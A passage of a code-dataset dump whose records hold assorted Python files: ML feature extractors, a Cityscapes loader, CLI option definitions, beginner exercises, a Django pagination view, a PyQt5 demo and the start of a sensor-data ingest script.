feature_name, col1_name, col2_name):\n        super().__init__(feature_name, col1_name, col2_name)\n\n    def extract_by_comparison(self, val1, val2):\n        if not val1 or not val2:\n            return 0\n        return 1 if val1 == val2 else -1\n\n\nclass SetColumnJaccardIndexFE(TwoArgComparisonBasedFE):\n    def __init__(self, feature_name, col1_name, col2_name):\n        super().__init__(feature_name, col1_name, col2_name)\n\n    def extract_by_comparison(self, set1, set2):\n        if not set1 and not set2:\n            return 0\n        return jaccard_sim(set1, set2)\n\n\n_NA_SPEC_VALUES = {'na', 'apply', 'none'}\n\n\ndef attr_val_is_na(tok_list):\n    if not tok_list:\n        return True\n    return len(tok_list) == 1 and tok_list[0] in _NA_SPEC_VALUES\n\n\nclass AttributeComparisonFE(TwoArgComparisonBasedFE):\n    def __init__(self, feature_name, col1_name, col2_name, attr_func_dict):\n        super().__init__(feature_name, col1_name, col2_name)\n        self.attr_func_dict = attr_func_dict\n        self.attr_keys_sorted = sorted(attr_func_dict.keys())\n\n    def extract_by_comparison(self, dict1, dict2):\n        result_list = []\n        for attr_name in self.attr_keys_sorted:\n            attr_func = self.attr_func_dict[attr_name]\n            v1 = dict1.get(attr_name)\n            v2 = dict2.get(attr_name)\n            result_list.append(self._comp_sim(v1, v2, attr_func))\n        return result_list\n\n    def _comp_sim(self, v1, v2, attr_func):\n        if v1 is None or attr_val_is_na(v1):\n            return 0\n        if v2 is None or attr_val_is_na(v2):\n            return 0\n        v1 = attr_func.normalize(v1)\n        v2 = attr_func.normalize(v2)\n        if v1 is None or v2 is None:\n            return 0\n        return attr_func(v1, v2)\n\n\nclass ExactStringAttributeSimilarity:\n    def normalize(self, tok_list):\n        return ' '.join(tok_list)\n\n    def __call__(self, v1, v2):\n        if v1 == v2:\n            return 1\n        else:\n            return -1\n\n\nDEFAULT_ATTR_SIM_DICT = {\n    'brand': ExactStringAttributeSimilarity(),\n    'model': ExactStringAttributeSimilarity(),\n    'mpn': ExactStringAttributeSimilarity(),\n    'upc': ExactStringAttributeSimilarity(),\n    'network': ExactStringAttributeSimilarity(),\n    'publisher': ExactStringAttributeSimilarity(),\n    'carrier': ExactStringAttributeSimilarity(),\n    'card manufacturer': ExactStringAttributeSimilarity(),\n    'year': ExactStringAttributeSimilarity(),\n    'platform': ExactStringAttributeSimilarity(),\n}\n\n\nclass FasttextVectorBasedFE(FeatureExtractor):\n    def __init__(self, feature_name):\n        super().__init__(feature_name)\n\n    def extract(self, item1, item2):\n        v1, oov_list_1 = item1.title_vector, item1.title_oov\n        v2, oov_list_2 = item2.title_vector, item2.title_oov\n        return self.extract_from_vectors(v1, v2, oov_list_1, oov_list_2)\n\n    def extract_from_vectors(self, v1, v2, oov_list_1, oov_list_2):\n        pass\n\n\ndef _text_to_vector_fasttext(ft_model, token_list, ret_oov_words=True):\n    vec_list = []\n    oov_words = []\n    for t in token_list:\n        if t in ft_model:\n            vec_list.append(ft_model[t])\n        else:\n            oov_words.append(t)\n    if len(vec_list) == 0:\n        result_vec = np.zeros(ft_model.dim)\n    else:\n        result_vec = np.array(vec_list).mean(axis=0)\n    # return the averaged vector, plus the list of OOV tokens when requested\n    return (result_vec, oov_words) if ret_oov_words else result_vec\n\n\nclass WVCosineSimilarityFE(FasttextVectorBasedFE):\n    def __init__(self, feature_name):\n        super().__init__(feature_name)\n\n    def extract_from_vectors(self, v1, v2, oov_list_1, oov_list_2):\n        return cosine_sim(v1, v2)\n\n\nclass WVPerDimDiffFE(FasttextVectorBasedFE):\n    def __init__(self, feature_name):\n        super().__init__(feature_name)\n\n    def extract_from_vectors(self, v1, v2, oov_list_1, oov_list_2):\n        diff_vec = v1 - v2\n        return list(diff_vec)\n\n\nclass OutOfWVFE(FasttextVectorBasedFE):\n    def __init__(self, feature_name):\n        super().__init__(feature_name)\n\n    def extract_from_vectors(self, v1, v2, oov_list_1, oov_list_2):\n        if not oov_list_1:\n            return 0\n        oov_set1 = set(oov_list_1)\n        if not oov_list_2:\n            return 0\n        oov_set2 = set(oov_list_2)\n        return jaccard_sim(oov_set1, oov_set2)\n\n\ndef cosine_sim(v1, v2, fallback_val=0):\n    v1_norm = np.linalg.norm(v1)\n    if v1_norm == 0:\n        return fallback_val\n    v2_norm = np.linalg.norm(v2)\n    if v2_norm == 0:\n        return fallback_val\n    dot_product = np.dot(v1, v2)\n    return dot_product / (v1_norm * 
v2_norm)\n","sub_path":"runtimes/custom_scikit/src/cfepm/fe/feature_extractors.py","file_name":"feature_extractors.py","file_ext":"py","file_size_in_byte":22340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438377512","text":"\"\"\"\n Cityscapes semantic segmentation dataset.\n\"\"\"\n\nimport os\nimport numpy as np\nimport mxnet as mx\nfrom PIL import Image\nfrom .seg_dataset import SegDataset\nfrom .voc_seg_dataset import VOCMetaInfo\n\n\nclass CityscapesSegDataset(SegDataset):\n \"\"\"\n Cityscapes semantic segmentation dataset.\n\n Parameters:\n ----------\n root : str\n Path to a folder with `leftImg8bit` and `gtFine` subfolders.\n mode : str, default 'train'\n 'train', 'val', 'test', or 'demo'.\n transform : callable, optional\n A function that transforms the image.\n \"\"\"\n def __init__(self,\n root,\n mode=\"train\",\n transform=None,\n **kwargs):\n super(CityscapesSegDataset, self).__init__(\n root=root,\n mode=mode,\n transform=transform,\n **kwargs)\n\n image_dir_path = os.path.join(root, \"leftImg8bit\")\n mask_dir_path = os.path.join(root, \"gtFine\")\n assert os.path.exists(image_dir_path) and os.path.exists(mask_dir_path), \"Please prepare dataset\"\n\n mode_dir_name = \"train\" if mode == \"train\" else \"val\"\n image_dir_path = os.path.join(image_dir_path, mode_dir_name)\n # mask_dir_path = os.path.join(mask_dir_path, mode_dir_name)\n\n self.images = []\n self.masks = []\n for image_subdir_path, _, image_file_names in os.walk(image_dir_path):\n for image_file_name in image_file_names:\n if image_file_name.endswith(\".png\"):\n image_file_path = os.path.join(image_subdir_path, image_file_name)\n mask_file_name = image_file_name.replace(\"leftImg8bit\", \"gtFine_labelIds\")\n mask_subdir_path = image_subdir_path.replace(\"leftImg8bit\", \"gtFine\")\n mask_file_path = os.path.join(mask_subdir_path, mask_file_name)\n if os.path.isfile(mask_file_path):\n self.images.append(image_file_path)\n self.masks.append(mask_file_path)\n else:\n print(\"Cannot find the mask: {}\".format(mask_file_path))\n\n assert (len(self.images) == len(self.masks))\n if len(self.images) == 0:\n raise RuntimeError(\"Found 0 images in subfolders of: {}\\n\".format(image_dir_path))\n\n def __getitem__(self, index):\n image = Image.open(self.images[index]).convert(\"RGB\")\n if self.mode == \"demo\":\n image = self._img_transform(image)\n if self.transform is not None:\n image = self.transform(image)\n return image, os.path.basename(self.images[index])\n mask = Image.open(self.masks[index])\n\n if self.mode == \"train\":\n image, mask = self._train_sync_transform(image, mask)\n elif self.mode == \"val\":\n image, mask = self._val_sync_transform(image, mask)\n else:\n assert (self.mode == \"test\")\n image = self._img_transform(image)\n mask = self._mask_transform(mask)\n\n if self.transform is not None:\n image = self.transform(image)\n return image, mask\n\n classes = 19\n vague_idx = 19\n use_vague = True\n background_idx = -1\n ignore_bg = False\n\n _key = np.array([-1, -1, -1, -1, -1, -1,\n -1, -1, 0, 1, -1, -1,\n 2, 3, 4, -1, -1, -1,\n 5, -1, 6, 7, 8, 9,\n 10, 11, 12, 13, 14, 15,\n -1, -1, 16, 17, 18])\n _mapping = np.array(range(-1, len(_key) - 1)).astype(np.int32)\n\n @staticmethod\n def _class_to_index(mask):\n values = np.unique(mask)\n for value in values:\n assert(value in CityscapesSegDataset._mapping)\n index = np.digitize(mask.ravel(), CityscapesSegDataset._mapping, right=True)\n return 
CityscapesSegDataset._key[index].reshape(mask.shape)\n\n @staticmethod\n def _mask_transform(mask):\n np_mask = np.array(mask).astype(np.int32)\n np_mask = CityscapesSegDataset._class_to_index(np_mask)\n np_mask[np_mask == -1] = CityscapesSegDataset.vague_idx\n return mx.nd.array(np_mask, mx.cpu())\n\n def __len__(self):\n return len(self.images)\n\n\nclass CityscapesMetaInfo(VOCMetaInfo):\n def __init__(self):\n super(CityscapesMetaInfo, self).__init__()\n self.label = \"Cityscapes\"\n self.short_label = \"voc\"\n self.root_dir_name = \"cityscapes\"\n self.dataset_class = CityscapesSegDataset\n self.num_classes = CityscapesSegDataset.classes\n self.test_metric_extra_kwargs = [\n {\"vague_idx\": CityscapesSegDataset.vague_idx,\n \"use_vague\": CityscapesSegDataset.use_vague,\n \"macro_average\": False},\n {\"num_classes\": CityscapesSegDataset.classes,\n \"vague_idx\": CityscapesSegDataset.vague_idx,\n \"use_vague\": CityscapesSegDataset.use_vague,\n \"bg_idx\": CityscapesSegDataset.background_idx,\n \"ignore_bg\": CityscapesSegDataset.ignore_bg,\n \"macro_average\": False}]\n","sub_path":"gluon/datasets/cityscapes_seg_dataset.py","file_name":"cityscapes_seg_dataset.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"439694160","text":"# (C) Copyright 2017 IBM Corp.\n# (C) Copyright 2017 Inova Development Inc.\n# All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nDefines click options that are used for multiple scommands and that have\nthe same definition throughout the environment. This allows the characteristics\nand help to be defined once and used multiple times.\n\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport click\n\n#\n# property_list option - Defined here because the option is used in\n# multiple places in the command structure.\n#\npropertylist_option = [ # pylint: disable=invalid-name\n click.option('--pl', '--propertylist', 'propertylist', multiple=True,\n type=str,\n default=None, metavar='PROPERTYLIST',\n help='Filter the properties included in the returned '\n 'object(s). '\n 'Multiple properties may be specified with either a '\n 'comma-separated list or by using the option multiple '\n 'times. Properties specified in this option that are '\n 'not in the object(s) will be ignored. '\n 'The empty string will include no properties. '\n 'Default: Do not filter properties.')]\n\nnames_only_option = [ # pylint: disable=invalid-name\n click.option('--no', '--names-only', 'names_only', is_flag=True,\n required=False,\n help='Retrieve only the object paths (names). '\n 'Default: Retrieve the complete objects including '\n 'object paths.')]\n\ninclude_classorigin_instance_option = [ # pylint: disable=invalid-name\n click.option('--ico', '--include-classorigin', 'include_classorigin',\n is_flag=True, required=False,\n help='Include class origin information in the returned '\n 'instance(s). '\n 'Some servers may ignore this option. 
'\n                          'Default: Do not include class origin information.')]\n\ninclude_classorigin_class_option = [  # pylint: disable=invalid-name\n    click.option('--ico', '--include-classorigin', 'include_classorigin',\n                 is_flag=True, required=False,\n                 help='Include class origin information in the returned '\n                      'class(es). '\n                      'Default: Do not include class origin information.')]\n\nnamespace_option = [  # pylint: disable=invalid-name\n    click.option('-n', '--namespace', type=str,\n                 required=False, metavar='NAMESPACE',\n                 help='Namespace to use for this command, instead of the '\n                      'default namespace of the connection.')]\n\nsummary_option = [  # pylint: disable=invalid-name\n    click.option('-s', '--summary', is_flag=True, required=False,\n                 help='Show only a summary (count) of the objects.')]\n\nverify_option = [  # pylint: disable=invalid-name\n    click.option('-V', '--verify', is_flag=True, required=False,\n                 help='Prompt for confirmation before performing a change, '\n                      'to allow for verification of parameters. '\n                      'Default: Do not prompt for confirmation.')]\n\nmultiple_namespaces_option = [  # pylint: disable=invalid-name\n    click.option('-n', '--namespace', type=str, multiple=True,\n                 required=False, metavar='NAMESPACE',\n                 help='Add a namespace to the search scope. '\n                      'May be specified multiple times. '\n                      'Default: Search in all namespaces of the server.')]\n\n#\n# The following options implement the filtering of class request\n# operations to filter by selected class qualifiers\n#\nassociation_filter_option = [  # pylint: disable=invalid-name\n    click.option('--association/--no-association',\n                 default=None,\n                 help='Filter the returned classes to return only association '\n                      'classes (--association) or classes that are not '\n                      'associations (--no-association). If the option is not '\n                      'defined, no filtering occurs.')]\n\nindication_filter_option = [  # pylint: disable=invalid-name\n    click.option('--indication/--no-indication',\n                 default=None,\n                 help='Filter the returned classes to return only indication '\n                      'classes (--indication) or classes that are not '\n                      'indications (--no-indication). If the option is not '\n                      'defined, no filtering occurs.')]\n\nexperimental_filter_option = [  # pylint: disable=invalid-name\n    click.option('--experimental/--no-experimental',\n                 default=None,\n                 help='Filter the returned classes to return only experimental '\n                      'classes (--experimental) or classes that are not '\n                      'experimental (--no-experimental). If the option is not '\n                      'defined, no filtering occurs.')]\n\n\ndef add_options(options):\n    \"\"\"\n    Accumulate multiple options into a list. 
This list can be referenced as\n    a click decorator @add_options(name_of_list)\n\n    The list is reversed because of the way click processes options\n\n    Parameters:\n\n      options: list of click.option definitions\n\n    Returns:\n        Reversed list\n\n    \"\"\"\n    def _add_options(func):\n        \"\"\" Reverse options list\"\"\"\n        for option in reversed(options):\n            func = option(func)\n        return func\n    return _add_options\n","sub_path":"pywbemtools/pywbemcli/_common_options.py","file_name":"_common_options.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"388077447","text":"import math\nimport random\n# Challenge 03\nprimeiroNum = int(input(\"Digite o primeiro numero: \"))\nsegundoNum = int(input(\"Digite o segundo numero: \"))\nsoma = primeiroNum + segundoNum\n# The {} placeholders are filled by the variables passed to format()\nprint(\"A soma entre {} e {} vale {}\".format(primeiroNum, segundoNum,soma))\n\n# Challenge 04\n\nalgo = input(\"Digite algo: \")\n\nprint(type(algo))\nprint(algo.isalpha())\nprint(algo.isupper())\nprint(algo.islower())\nprint(algo.isnumeric())\n\n# Challenge 05\nnum = int(input(\"digite um numero: \"))\n\nantecessor = num - 1\nsucessor = num + 1\n\nprint(\"O numero antecessor é {} e numero sucessor é {}\".format(antecessor, sucessor))\n\n# Challenge 06\n\nnum = int(input(\"Digite um numero: \"))\n\ndobro = num*2\ntriplo = num *3\nraiz = math.sqrt(num)\n\nprint(\"O dobro de {} é {}, o triplo é {} e a raiz é {}\".format(num, dobro, triplo, raiz))\n\n# Challenge 07\n\nnota1 = float(input(\"Digite a primeira nota: \"))\nnota2 = float(input(\"Digite a segunda nota: \"))\n\nmedia = (nota1 + nota2) / 2\n\nprint(\"A media de {} e {} é {}\".format(nota1, nota2, media))\n\n# Challenge 08\n\nmedida = float(input(\"Digite a medida: \"))\n\ncm = medida * 100\nmm = medida * 1000\n\nprint(\"A medida de {} corresponde a {} cm e a {} mm\".format(medida, cm, mm))\n\n# Challenge 09 \n\nnumero = int(input(\"Digite um numero: \"))\nprint(\"-----------------\")\nfor i in range(1,11):\n    num = numero * i\n\n    print(\"{} x {} = {} \".format(numero, i, num))\nprint(\"----------------\")\n\n# Challenge 10\n\ndinheiro = float(input(\"Quanto de dinheiro vocẽ tem: R$ \"))\n\ndolar = dinheiro / 3.27\n\nprint(\"Com R$ {} voce pode comprar US$ {:.2f} dolares\".format(dinheiro, dolar))\n\n# Challenge 12\n\nvalor = float(input(\"Quanto custa o produtor: R$ \"))\ndesconto = int(input(\"Valor de desconto: \"))\n\nvalorPrevio = (desconto*valor) / 100\nvalorFinal = valor - valorPrevio\nprint(\"O produto vale R$ {} com o desconto de {} o valor fica de R$ {}\".format(valor, desconto, valorFinal))\n\n# Challenge 13\n\nsalario = float(input(\"Seu salario é: R$ \"))\naumento = int(input(\"Quantos porcento de aumento: \"))\n\nprevia = (salario*aumento) / 100\nsalarioFinal = salario + previa\nprint(\"Você recebe R$ {} com um aumento de {} %, você passa a receber R$ {:.2f}\".format(salario, aumento, salarioFinal))\n\n# Challenge 15\n\ndia = int(input(\"Quantos dias irá alugar o carro: \"))\nkm = float(input(\"Quantos km o carro irá roda: \"))\n\nvalor1 = dia*60\nvalor2 = km*0.15\n\nvalorFinal = valor1+valor2\n\nprint(\"O total a pagar é {}\".format(valorFinal))\n\n# Challenge 16\n\nnumero = float(input(\"Digite o numero: \"))\n\nnum = math.trunc(numero)\n\nprint(\"Valor digitado foi {} e sua porção inteira é {}\".format(numero, num))\n\n# Challenge 17\n\nco = float(input(\"Comprimento do cateto oposto: \"))\nca = float(input(\"Comprimento do cateto adjacente: \"))\nhi = 
math.hypot(co, ca) \n\nprint(\"A hipotenusa vai medir {:.2f}\".format(hi))\n\n# Challenge 18\n\nangulo = float(input(\"Digite o angulo: \"))\n\nsen = math.sin(math.radians(angulo))\ncos = math.cos(math.radians(angulo))\ntag = math.tan(math.radians(angulo))\n\nprint(\"O valor de {} em seno é {:.2f}\".format(angulo, sen))\nprint(\"O valor de {} em cosseno é {:.2f}\".format(angulo, cos))\nprint(\"O valor de {} em tangente é {:.2f}\".format(angulo, tag))\n\n# Challenge 19\n\nn1 = input(\"Digite um nome: \")\nn2 = input(\"Digite outro nome: \")\nn3 = input(\"Digite outro nome: \")\n\nlista = [n1,n2,n3]\n\nescolhido = random.choice(lista)\n\nprint(\"Nome sorteado foi {}\".format(escolhido))\n\n# Challenge 20\n\nn1 = input(\"Digite um nome: \")\nn2 = input(\"Digite outro nome: \")\nn3 = input(\"Digite outro nome: \")\n\nlista = [n1,n2,n3]\n\nrandom.shuffle(lista)\n\nprint(lista)\n","sub_path":"praticando.py","file_name":"praticando.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"224983904","text":"#!/bin/python3\r\n\r\nimport sys\r\n\r\n\r\n#Maria plays n games of college basketball in a season.\r\n#Because she wants to go pro, she tracks her points scored per game sequentially in an array defined as score[] = [s0, s1, ..., s[n-1]].\r\n# After each game i, she checks to see if score s[i] breaks her record for most or least points scored so far during that season.\r\n#\r\n#Given Maria's array of scores for a season of n games, find and print the number of times she breaks her record for most and \r\n#least points scored during the season.\r\n#\r\n#Note: Assume her records for most and least points at the start of the season are the number of points scored \r\n#during the first game of the season.\r\n#\r\n#Input Format\r\n#\r\n#The first line contains an integer denoting n (the number of games). 
\r\n#The second line contains n space-separated integers describing the respective values of s[0],s[1],...s[n-1].\r\n\r\n\r\n\r\n\r\ndef getRecord(s):\r\n # Complete this function\r\n h = s[0]\r\n nh = 0\r\n nl =0\r\n l = s[0]\r\n for i in range(1,len(s)):\r\n if s[i] < l:\r\n nl = nl + 1\r\n l = s[i]\r\n elif s[i] > h:\r\n nh += 1\r\n h = s[i]\r\n return(nh,nl)\r\n \r\n \r\n \r\n \r\n \r\nn = int(input().strip())\r\ns = list(map(int, input().strip().split(' ')))\r\nresult = getRecord(s)\r\nprint (\" \".join(map(str, result)))\r\n","sub_path":"breakrecord.py","file_name":"breakrecord.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"175352170","text":"import numpy as np\nimport os \ni=0\nlocation=\"/datastorage/simonsch/analyze_velocity/npy_velocities\"\n\nwhile(os.path.exists(location+\"/frame%d.npy\"%i)):\n\tinArray=np.load(location+\"/frame%d.npy\"%i)\n\tfor j in range(len(inArray[:,0])-1):\n\t\tif(inArray[:,0][j+1]-inArray[:,0][j]) != 1:\n\t\t\tprint(\"Something went wrong\")\n\n\tprint(i)\t\n\ti+=1\n\t\n","sub_path":"scripts/testifvelocitiesarecorrect.py","file_name":"testifvelocitiesarecorrect.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"141264578","text":"def uncrossing(string):\n sum = 0\n dict1 = {'A': 1, 'C': 2, 'G': -2, 'U': -1}\n for i in string:\n sum += dict1[i]\n return sum\n\ndef mapping(string,dic):\n dict2 = {'A': 'U', 'C': 'G', 'G':'C', 'U': 'A'}\n list = []\n if len(string) <= 2:\n return 1\n elif string in dic:\n return dic[string]\n\n for i in range(len(string)):\n if dict2[string[0]] == string[i] and uncrossing(string[0:i + 1]) == 0:\n list.append(i)\n sum = 0\n for i in list:\n if mapping(string[1:i], dic) != None and mapping(string[i+1: len(string)], dic) != None:\n sum += mapping(string[1:i], dic) * mapping(string[i+1: len(string)], dic)\n dic[string] = sum\n return dic\n\n\nif __name__ == '__main__':\n string_s = 'CUUCCGUGCACGCUUCCGGAUAAUUCGACGCGACGUCGACGGGCAGCUCGCGCAUGAAUUGUUAGCCGGCCAUGAUAAUUAUAGCACUAUAUAUAUAACCGGCGUGGUGCUAACGCUGCAGCAAGAUAUCCCGAAUUGCUAGGAUCGCUUUGAUCAACGGGGCCGCGGGGGCCAUGGCGCCCUUAACCAAAUAGCUUUAAUUGUAGCCCGACCGCGGUAGCUCGGCGUACCAUGCAUGGCAUUA'\n dic = {}\n print(sorted(mapping(string_s,dic).values())[-1]%1000000)\n\n","sub_path":"CAT_CatalanNumbers.py","file_name":"CAT_CatalanNumbers.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"449854394","text":"from functools import reduce\nimport json\n\nimport django.apps\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models.base import ModelBase\nfrom django.db.models.query import QuerySet\nfrom django.http import JsonResponse, HttpResponseNotAllowed\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.views.generic.base import View, ContextMixin, TemplateResponseMixin\n\n\nclass Pagination(TemplateResponseMixin, ContextMixin, View):\n model = None\n order = []\n paginate_by = 4\n object_name = 'items'\n object_list = []\n\n @classmethod\n def get_parents(cls):\n return [x.__name__ for x in cls.__bases__]\n\n def dispatch(self, request, *args, **kwargs):\n if 'ListView' in self.get_parents():\n self.object_list = self.get_queryset()[:self.paginate_by]\n else:\n self.object_list = self.get_qs()[:self.paginate_by]\n return super(Pagination, self).dispatch(request, 
*args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n context = self.get_context_data(**kwargs)\n return self.render_to_response(context)\n\n def get_qs(self):\n qs = None\n return qs\n\n def get_context_data(self, **kwargs):\n context = super(Pagination, self).get_context_data(**kwargs)\n model_fields = self.model._meta.fields\n if len(self.order):\n f_dict = {i: j.name for i, j in enumerate(model_fields)}\n fields = ','.join(list(dict(sorted(f_dict.items(), key=lambda x: self.order.index(x[1]))).values()))\n else:\n fields = ','.join(i.name for i in model_fields)\n context['fields'] = fields\n context['model'] = self.model.__name__\n context['paginate_by'] = self.paginate_by\n context[self.object_name] = self.object_list\n return context\n\n\nclass GetPaginationItems(View):\n def __init__(self):\n super().__init__()\n z = django.apps.apps.get_models(include_auto_created=False)\n self.models = {x.__name__: x for x in z}\n self.additional_field_keys = []\n\n def gather_items(self, model, additional_qs, lst):\n v = []\n for g in lst:\n if isinstance(g[1].__class__, ModelBase):\n if g[1]._meta.concrete_model.__name__ != model:\n v.append(dict(\n [(f'{additional_qs}.{g[0]}.{k.name}', getattr(g[1], k.name))\n for k in g[1]._meta.fields if k.is_relation is False]))\n else:\n v.append({f'{additional_qs}.{g[0]}': g[1]})\n for f in list(reduce(lambda x, y: x + y, [list(x.keys()) for x in v])):\n if f not in self.additional_field_keys:\n self.additional_field_keys.append(f)\n return v\n\n def get(self, request):\n return HttpResponseNotAllowed(['XHR'])\n\n def post(self, request):\n if request.is_ajax():\n res = []\n filter_kwargs = json.loads(request.POST['filter'])\n step = int(request.POST['step'])\n next_step = int(request.POST['next_step'])\n additional = json.loads(request.POST['additional'])\n named = json.loads(request.POST['named'])\n model = request.POST['pagination_model']\n items = self.models[model].objects.filter(**filter_kwargs).order_by('id')[step:next_step]\n\n for i in items:\n z = {}\n if bool(int(request.POST['nested'])) is False:\n z.update({x.name: getattr(i, x.name) for x in i._meta.fields if x.is_relation is False})\n res.append(z)\n else:\n for x in i._meta.fields:\n if x.is_relation is False:\n z.update({x.name: getattr(i, x.name)})\n else:\n field_keys = [i for i in x.related_model._meta.fields if i.is_relation is False]\n try:\n rel = x.related_model.objects.get(id=getattr(i, f'{x.name}_id'))\n except ObjectDoesNotExist:\n\n rel = [None for x in range(len(\n field_keys))]\n if not isinstance(rel, list):\n if bool(int(named)) is False:\n z.update(\n {x.name: [getattr(rel, k.name) for k in rel._meta.fields if\n k.is_relation is False]})\n else:\n f = [k.name for k in rel._meta.fields if k.is_relation is False]\n z.update({x.name: [{f'{x.name}.{i}': getattr(rel, i)} for i in f]})\n z[x.name].append({'field_keys': [f'{x.name}.{k}' for k in f]})\n else:\n z.update({x.name: rel})\n z[x.name].append({'field_keys': [f'{x.name}.{h.name}' for h in field_keys]})\n\n if len(additional):\n for a in additional:\n if 'qs' in a:\n additional_qs = a['qs']\n filter_kwargs = {}\n if 'method' not in a:\n additional_method = 'all'\n else:\n additional_method = a['method']\n if 'filter_kwargs' in a:\n filter_kwargs.update(a['filter_kwargs'])\n try:\n qs = getattr(getattr(i, additional_qs), additional_method)(**filter_kwargs)\n if isinstance(qs, QuerySet) and len(qs):\n b = []\n for q in qs:\n lst = [(x.name, getattr(q, x.name)) for x in q._meta.fields]\n v = self.gather_items(model, 
additional_qs, lst)\n                                        b.append(v)\n                                    z.update({additional_qs: b, 'additional_field_keys': self.additional_field_keys})\n                                else:\n                                    z.update({additional_qs: None, 'field_keys': []})\n                                if not isinstance(qs, QuerySet) and qs is not None:\n                                    b = []\n                                    fields = [x.name for x in qs._meta.fields]\n                                    lst = [(f, getattr(qs, f)) for f in fields]\n                                    v = self.gather_items(model, additional_qs, lst)\n                                    b.append(v)\n                                    z.update({additional_qs: b, 'additional_field_keys': self.additional_field_keys})\n\n                            except Exception as e:\n                                data = {'error': str(e)}\n                                return JsonResponse(data, encoder=DjangoJSONEncoder)\n                res.append(z)\n            data = {'items': res}\n            return JsonResponse(data, encoder=DjangoJSONEncoder)\n        else:\n            return HttpResponseNotAllowed(['XHR'])\n","sub_path":"apps/tw_pagination/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"611297188","text":"\"\"\"5. Write a function translate() that will translate a text into \"rövarspråket\" \n(Swedish for \"robber's language\"). That is, double every consonant\nand place an occurrence of \"o\" in between. For example, translate(\"this is fun\") \nshould return the string \"tothohisos isos fofunon\".\"\"\"\n\n\ndef translate(text):\n    # consonants only; vowels are left untouched\n    consonants = list(\"bcdfghjklmnpqrstvwxz\")\n    translated = []\n    for char in text:\n        if char in consonants:\n            char = char + 'o' + char\n            translated += char\n        else:\n            translated += char\n\n    return ''.join(translated)\n\n\ndef main():\n    print(translate(\"this is fun\"))\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"287685625","text":"# Write the logic code in test.py\n\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget\nfrom designer import Ui_Form\n\nclass Demo(QWidget,Ui_Form):\n    def __init__(self):\n        super(Demo,self).__init__()\n        self.setupUi(self)\n        self.text_edit.textChanged.connect(self.show_text_func)\n\n    def show_text_func(self):\n        self.text_browser.setText(self.text_edit.toPlainText())\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    demo = Demo()\n    demo.show()\n    sys.exit(app.exec_())","sub_path":"pyQt5/第十四章 快速制作界面——Qt Designer/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"459795312","text":"#Imports\r\nfrom datetime import datetime\r\nfrom glob import glob\r\nimport argparse\r\nimport csv\r\nimport dateutil.parser\r\nimport json\r\nimport logging\r\nimport os\r\nimport records\r\nimport urllib.request as ur\r\nimport urllib.parse\r\nimport xml.etree.ElementTree as ET\r\n\r\n#Global variables\r\nCSVCHUNKSIZE = 1000\r\nconnstring = 'postgres://sos:sensors@ingest_data:5432/ingest'\r\ndb = records.Database(connstring)\r\nurl = None\r\nstation_meta_template=\"templates/station_template.txt\"\r\nsensor_meta_template=\"templates/sensor_template.txt\"\r\nresult_meta_template=\"templates/result_template.txt\"\r\ndata_template=\"templates/data_template.txt\"\r\n\r\nmetadata_headers=[\r\n    'stationid',\r\n    'shortName',\r\n    'longName',\r\n    'easting',\r\n    'northing',\r\n    'altitude',\r\n    'organizationName',\r\n    'organizationURL',\r\n    'contact',\r\n    'waterbodyType',\r\n    'urn-org',\r\n    'suborg']\r\n\r\nparameter_headers=[\r\n    'parameter',\r\n    'parameterName',\r\n    'parameterUnit',\r\n    'fieldName',\r\n    
